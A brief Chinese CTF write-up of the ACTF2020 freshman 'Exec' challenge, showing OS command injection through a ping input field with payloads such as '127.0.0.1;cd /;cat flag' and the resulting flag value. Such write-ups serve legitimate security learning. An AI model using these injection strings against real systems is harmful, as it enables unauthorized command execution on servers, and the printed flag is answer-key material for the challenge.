[ACTF2020 新生赛]Exec 1

[ACTF2020 新生赛]Exec 1

下午写了这个，看了别人的解题过程，还是不太能理解。

 

 题目有可能是sql注入，也可能是命令执行漏洞。

输入ping 127.0.0.1;ls

直接显示index.php

Linux系统显示网页的路径是/var/www/html,说明index.php在路径中

返回根目录看看是否有flag,127.0.0.1;cd /;ls

 

 

 

 能看见flag在目录中

最后127.0.0.1;cd /;cat flag

 

得到flag{131b1282-4d92-49ca-af2b-b3393f9ccc29}